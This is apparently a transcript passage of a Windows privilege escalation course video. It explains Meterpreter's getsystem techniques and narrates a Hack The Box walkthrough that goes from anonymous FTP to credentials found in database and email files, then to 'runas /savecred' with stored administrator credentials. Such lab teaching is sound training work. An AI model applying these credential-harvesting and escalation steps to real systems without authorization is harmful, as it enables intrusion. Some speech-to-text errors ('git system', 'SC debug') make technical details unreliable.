can show you this technique now the technique is called get system now we run it and you can see that it tries to elevate the system in a few different ways it tries two different types of name pipe impersonations and it tries token duplication now if we do a git system Dash h it tells you hey you can run this and run all three as zero or we can do a dash T and run one or three or two or however we want to do this now what is happening when we run this git system and when should we attempt it that's important as well if you're on a box say just Capture the Flag type box running git system never hurts if I pop onto a machine and I run git system and it works great game over easy win okay if you're in a real environment not so much and this might come up in an interview where you might need to know what this is actually doing so it doesn't hurt to understand so I kind of wanted to point this out it's just a real quick easy way to try to get win but you should know what you're doing so there's a great blog from Cobalt strike that talks about what happens when you type git system now there are two techniques that are pretty much the same there is the name pipe impersonation okay so we are impersonating and we're going to try to impersonate into system all right so it's going to create a pipe when it is spawned the command.exe connects to interpreter's name pipe interpreter has the opportunity to impersonate that security context that's Technique One technique two identical except that it drops into disk so it drops on disk so it is recommended not to run this because this can actually get caught by uh antivirus you don't want to run this or get detected uh then I would just skip running two completely but it does run on disk drops a dll to the disk and schedules a run dll 32 exe as a service to try to elevate here now technique 3 takes advantage of something else the SC debug privilege okay so it Loops through all the open services that is running and tries to find one running a system and that you have permissions to inject into so if you have all this enabled here then you're able to inject and it's going to attempt to get the system for you as well so you should have a little bit of a deeper understanding as to what's going on as opposed to just like hey firing this off and letting it run so if you're ever asked you know what are you doing when you run git system say hey there's two different types of name python impersonation ones in memory and one's actually on disk and I probably should run that one and then number three is this token duplication and it requires the SED bug privilege to be enabled and you can go into a lot more depth okay so keep going into depth on these learn read take good notes understand these at a deeper level but don't just fire willy-nilly without knowing what you're doing and the reasoning behind it so this is the git system great technique to try especially on again these Capture the Flag systems but uh avoid just running this on any system that you have if you're doing a pen test for example and this could actually Crash from a machine so you should be very careful when you're running this so that's it for this lesson so I'll catch you over in the next section all right in this section we're going to be exploring the run as command now this is absolutely something you should be checking for when you log on to a Windows machine as a low level user what the run as command does is it allows us to run a command as somebody else so in this instance we're going to be using run as as the administrator so we're going to do that on the box that you're going to be seeing here soon so it's going to be our premise technique and let's go ahead and talk about that so on hack the Box we're going to be utilizing the box of access which is at 10.10.10.98 so go ahead and start that and get your scan going now the one thing that I can tell you is if you're looking to explore this on your own and you should be is go ahead and note that you're going to be looking for a command key slash list that is the command that's going to look for stored credentials on a machine machine so if you do get a low level shell and you want to consider moving forward go ahead and run command key slash list however a tool like winpies or even a tool like Jaws some tools along those lines basic Powershell scripts will run and will tell you this now this box is a little older so you're going to have to find the right tools that work but if you do run that tool it will tell you as well but we're going to utilize the command key slash list to just view this on our own so those are some big hints on how we're going to take down this box but now my challenge to you is to get the low level user first and then we'll work through this so I'll catch you in the next video as we walk through the low level user and hopefully gain access to this machine so here we are we have our nmap scan back and we have three ports open we've got FTP we've got telnet and we've got HTTP that's it so we can go out really quick to the interwebs and see if HTTP has anything for us so I'll just create a new tab hit enter and we've got this megacorp that's it we've got this page here you can view the source and see if there's anything here um I've got it selected sorry view the page Source there's nothing really here if there is an exploit this way we're going to have to look into either what's running on the back end here we can see is 7.5 Windows Server uh maybe there's directory busting we need to do Etc but we're going to explore the other paths first so what I'm going to do is I'm going to open up a new tab and I'm just going to see if FTP is open so we'll FTP to this machine and I'm going to try Anonymous login and the only other option is we could try logging in with telnet and seeing if we can get in that way but here we have Anonymous login so I'm going to go ahead and just say LS and we can see we've got a backups and an engineer folder here so I'm going to switch over to Binary when we go into FTP we are typically in ASCII by default now we have transfer issues sometimes with ASCII so it's always good to switch to Binary when you're transferring files now we can't do the recurse on I actually tried that and it's saying hey invalid command so we're just going to go into both of these and we're just going to grab the files that are in them so if we LS there's a backup.mdb so we could say get backup.mdb just like that it'll grab the file and then we're going to do this again for the other file so we'll CD and then we're going to go into CD engineer LS and we're going to grab this access control so we'll just say Access Control dot zip just like that and now we have both of those so let's go ahead and explore what we just grabbed if I go to my files and my downloads I've got this access control.zip and I can see that there's a PST here which is a email file right so this is commonly associated with something like Microsoft Office but it doesn't have to be now this can be opened with other tools same thing with this MDB this is a access database or a database now the way I'm going to access these here coming up is going to be using Microsoft Office however there are alternatives and I will present those to you they are not installed on Cal you'll have to take that your own path so what you can utilize is you can utilize to read this backup file here you can utilize a tool called and I'll type this out for you so you can utilize a tool called MDB SQL and just run it against backup.mdb and then you can also use a tool for the PST of read PST so those are the two tools that you should use if you want to use it in a complete Linux format otherwise as long as you have access to opening these files you should be okay so what I've done is I've taken these files and I've moved them over and I'm just going to show you what they look like opened up so let me open up the access database which is the backup database I'm going to bring this over and you're going to see there's a bunch of tables in here now you have to kind of enumerate through these tables and see what you can you can find but if we scroll through there is the auth user table here and it gives us a few different categories it gives us a username password last login Etc now we have admin admin backup admin admin and then we have engineer and access for you at security so I'm going to copy this password and this is a lot of trial and error so if you did this box on your own and it took you a while to find this that's absolutely fine I remember doing this box back when it was a live box and hack the box and it took me a couple days to actually solve this just because there's a lot of enumeration to go through and it's not the easiest of boxes just because of the hurdles you have to go through so let's go ahead and just minimize this and we're gonna go and try to access this other file now I tried to telnet originally and if you tried to telnet that's absolutely fine you could say hey admin or security or whatever user I'm gonna try to log in with them and see if it works unfortunately it didn't work so I'm going to go into our files and then I'm going to go to the access control zip and I'm going to try to migrate this access control over and I'm going to paste this password that we found and I've already got the file here but we'll just say replace so then this accesscontrol.pst comes in I've gone ahead and loaded that access control PST into Outlook and I've just grabbed the file so here is the email there's one email that was sitting in there from John megacorp.com to security at accesscontrollsystems.com and it says the password for the security account has been changed to this password so please ensure to pass on to your engineers so I'm going to copy this password and now we know also that the username is security so again kind of went through that a little bit quick but what has happened here is we had Anonymous login right Anonymous login on FTP permitted us to find these backup files we found the backup files and we utilized the database to find the auth table the auth table allowed us to access this PST here we extracted the PST and inside the PST was an email so this box is called access it's just a hint that we had to use access to actually access that's fun to say okay so anyways what we're going to do now is we're going to telnet into the machine or at least attempt to telnet into the machine so we'll say telnet and we're going to do we'll do a dash L for the username which is security we're going to say 10.10.10.98. okay and it's a little slow as you can see all right let's paste the password now or let's actually just paste we'll say security and then we'll paste the password see if this lets us log in okay we are in so UCC user security so this is the Baseline here we have gotten a user account all we want to do in this escalation attempt for moving forward is we want to be able to get a shell so this is your challenge for the next video we want to get a complete shell we want to take that shell we want to do the enumeration of the credentials so we're going to try to find that command key slash list in order to run that we need a full C shell and then we'll go ahead and see if we can't download the root dot text that is really the challenge here we're not going to try to escalate as I feel like that's going to be out of the scope of this course at least the escalation into the administrative account is going to be out of out of scope but the save as is very very in scope for the escalation here so we're going to go ahead and try to utilize the save as to grab the root dot txt off of the administrative desktop okay so I will see you guys in the next video as we try to achieve that all right so here we are at our telnet session now when we spoke in the last video we talked about the command key slash list being the big hint of what we need to do and when we talk about methodology this is just another tool to add to your toolkit from here there's a lot of different paths that we can take we can utilize this telnet session which is a shell and utilize this to navigate around perhaps we can try to run some sort of Powershell or run a tool like wind peas or like power up Etc see what the lay of the land is we can absolutely even just look for hints around the environment itself we can navigate see if there's anything in the security folder or this user of security their desktop documents if there's anything in the program files we're going to do our due diligence and kind of just work down a checklist and that's the point where we're at is we're just working down a checklist so even though I show you the escalation path here it's just to show you a tool for your toolkit so keep this in mind again from the very first or second video I told you to take good notes add this to your notes okay so what we're looking at is a command key forward slash list if I could type command key forward slash list and you're going to see here that we have currently store credentials of the target of access administrator so that's great and we have a domain password stored so we're going to use a tool called run as.exe which is built into Windows now I'm going to copy a command because you just saw what happened when I fat fingered this and I fat finger all the time so I'm going to copy the command and then you can just copy this as well while I'm speaking about it so what the command is is we're going to run system32 run as.exe and we're going to say hey I want to use the user access administrator and with this user of access administrator I want to run the save cred save cred is just hey I'm going to use the save credentials that are here for me we're going to run command.exe a forward slash C and then we're going to just copy over the root dot text we're going to type it out this is basically like an echo command we're going to type out the command and drop it into the security folder of root.txt now there's a lot of different ways that we can do this we could say hey I want to run command.exe and just run a copy and we can copy the file over so we have options right so the type command is just one way of doing this now we're using full paths here there's a chance that we could just use run as.exe and command.exe but it's always good to just practice with using full paths in case the path isn't there so if you were to come in here and try this and it doesn't give you any inclination of whether or not it's working or not or whether or not the the run as is working at all then you might lose your mind and say you know I'm sure this is it but maybe there's a different path out there and just Abandon Ship so you don't want to you don't want to do that you wanna make sure that you call the Full Pass just to be safe so here we are if we hit enter on this and we just now type in dur you can see we've grabbed this root.txt and we could prove concept by just doing a type here if we say type root.txt and see if this works on the admin we should get access denied so access is denied but now we've copied that file why because we're acting as the administrator on this machine and that's really the big takeaway is if you have the ability to run as you have a lot of flexibility you can run different commands we ran a command.exe with a slash C imagine the flexibility and types of commands that you can run just because we did a type here or we could do a copy doesn't mean we can't do other commands here that could be beneficial to us so hopefully that gets your wheels spinning as to how powerful this is you could think of this just as like a pseudo command I'm going to run sudo as this user so if you're familiar with Linux same thing we're running as a user the only benefit here is we don't have to have the credentials they're stored for us so that's super nice so that's it for this lesson I'll catch you over in the next section congratulations you have made it to the end of this course so again just to recap this was the first three or so hours of this seven hour course if you come through and you want to purchase it you have the ability to come through and learn much more including registry attacks executable files startup applications etc etc all this material is included in the course purchase and again even if you don't purchase if you like the video please do drop a like please consider subscribing to the channel we do drop full course videos quite often along with other hacking related and cyber security related materials so we'd love to have you as a subscriber with that being said my name is Heath Adams and I really thank you for joining me through this course until next time peace out

Info

Channel: The Cyber Mentor

Views: 38,267

Rating: undefined out of 5

Keywords:

Id: uTcrbNBcoxQ

Channel Id: undefined

Length: 191min 44sec (11504 seconds)

Published: Fri May 05 2023